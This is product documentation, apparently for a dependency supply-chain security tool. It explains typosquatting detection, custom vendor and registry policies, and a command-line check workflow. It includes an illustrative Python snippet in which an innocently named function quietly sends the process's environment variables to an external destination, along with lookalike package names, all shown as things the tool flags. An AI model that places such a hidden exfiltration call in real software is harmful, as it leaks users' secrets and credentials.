Overview

Dependencies change frequently and are nearly impossible to manage. Zenable monitors dependency changes, detects suspicious packages, prevents lookalike attacks, and monitors for unwanted behavior / insider threats - providing a protected supply chain and significant reduction in insider threat risk.

Out-of-the-Box Protection

Zenable automatically provides these standard supply chain protections:

Standard Security Checks

  • Typosquatting Detection - Identifies lookalike package names
  • Known Vulnerabilities - Checks against CVE databases
  • Suspicious Patterns - Detects obfuscated code, unexpected network calls
  • License Compliance - Flags incompatible licenses
  • Outdated Dependencies - Identifies severely outdated packages
  • Malicious Package Detection - Checks against known malware databases

Custom Organization Requirements

Layer your specific supply chain policies on top:
“All dependencies must be from our approved vendor list, no GPL licenses in production code, all packages must be internally mirrored, and any package from developers outside our organization requires security team approval.”

Example: Custom Vendor Requirements

Your Policy: “Only use packages from approved vendors with active support contracts” 
// ❌ Zenable flags unapproved dependency
{
  "dependencies": {
    "random-utility": "^1.0.0",  // Not from approved vendor
    "community-lib": "^2.3.1"    // No support contract
  }
}

// ✅ Zenable ensures compliance
{
  "dependencies": {
    "@approved-vendor/utility": "^1.0.0",
    "@enterprise/supported-lib": "^2.3.1"
  }
}

Example: Internal Registry Enforcement

Your Policy: “All packages must be pulled from our internal Artifactory mirror” 
# ❌ Standard npm install
npm install express

# ✅ Zenable enforces internal registry
npm install express --registry=https://artifactory.company.com/npm

In Action

# First, get a more useful summary of the uv.lock file
uv export --format requirements-txt --no-hashes > temp-requirements.txt

# Then, check your dependencies for both standard and custom violations
uvx zenable-mcp check package.json temp-requirements.txt

# Cleanup
git checkout HEAD -- temp-requirements.txt 2>/dev/null || rm -f temp-requirements.txt

Example Protection

Lookalike Package Detection

// ❌ Zenable detects typosquatting
{
  "dependencies": {
    "expresss": "^4.17.1",  // Extra 's' - likely typosquatting
    "momnet": "^2.29.1"     // 'momnet' instead of 'moment'
  }
}

Suspicious Behavior Detection

# ❌ Zenable flags unexpected behavior in dependencies
def innocent_function():
    # Hidden data exfiltration attempt
    import os
    send_to_external(os.environ)

Continuous Protection

Zenable continuously monitors your dependencies for:
  • Changes in package behavior between versions
  • New or modified dependencies in your codebase
  • Suspicious patterns that could indicate compromise
  • Lookalike packages that could be malicious

Benefits

  • Protected Supply Chain - Comprehensive monitoring of all code changes and usage of new dependencies
  • Reduced Insider Threat Risk - Detect and prevent malicious updates from compromised developers
  • Prevent Lookalike Attacks - Catch typosquatting and similar attacks before they cause damage
  • Monitor Unwanted Behavior - Identify when dependencies start behaving suspiciously

Real-World Custom Examples

Financial Services Requirements

Policy: “All cryptographic libraries must be FIPS 140-2 validated”

Healthcare Requirements

Policy: “No dependencies can transmit data to servers outside the US”

Government Requirements

Policy: “All dependencies must be from US-based developers with security clearance”